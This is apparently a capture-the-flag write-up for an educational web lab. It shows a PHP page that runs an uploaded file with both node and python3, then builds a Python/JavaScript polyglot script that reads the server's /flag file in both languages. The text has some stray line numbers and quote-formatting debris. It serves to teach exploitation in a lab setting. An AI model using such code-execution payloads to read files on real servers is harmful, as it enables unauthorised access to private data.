Simple Welcome - 0x04(Lab - Script)

Posted on | Post modified | In |

Simple Welcome - 0x04(Lab - Script)

tags: CTF Web eductf

Challenge: https://pyscript.ctf.zoolab.org/

Source Code

<?php
    if(!isset($_FILES["file"]))
        highlight_file(__file__) && die();
    $flag = file_get_contents('/flag');
    $node = @`node {$_FILES["file"]["tmp_name"]} 2>&1`;
    $python = @`python3 {$_FILES["file"]["tmp_name"]} 2>&1`;
    if($flag === $node && $flag === $python)
        echo 'Here is your Flag: '.$flag;
    else
        echo 'Fail :(';
?>

Analysis

Must write a script that can be executed in python and node language simultaneously.

Exploit - Using comment

  1. In python The comment is # for single line and ''' for multi lines
  2. In node The comment is // for single line and /**/ for multi lines
  3. Using different definition of comment to write script Some tips: 
     a = 1 // 1;
 b = ''''''

    Both of these instruction are valid in python

  4. Whole payload
    • Python ```python! a = 1 // 1 ; b = ‘’’

    console.log(‘Javascript code here’);

    /* ‘’’

    print(‘Python code here’)

    # */

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    		 
           * Javascript
 ```javascript!
 a = 1 // 1 ; b = '''

 console.log('Javascript code here');

 /* '''

 print('Python code here')

 # */
  • Whole exploit 
      a = 1 // 1 ; b = '''

  const fs = require('fs');

  fs.readFile("/flag", 'utf8',(error, data) => {
      if (error) {
          console.error(error);
          return;
      }
      console.log(data.split('\n')[0]);
  })

  /* '''

  f = open("/flag", "r")
  print(f.read().split('\n')[0])
  # */

Reference

【已解决】PHP中函数前面加上at符号@的作用 [shell 2>&1是甚麼意思] How to open a local file with JavaScript? How to Read/Write local files with Node.js String.prototype.split()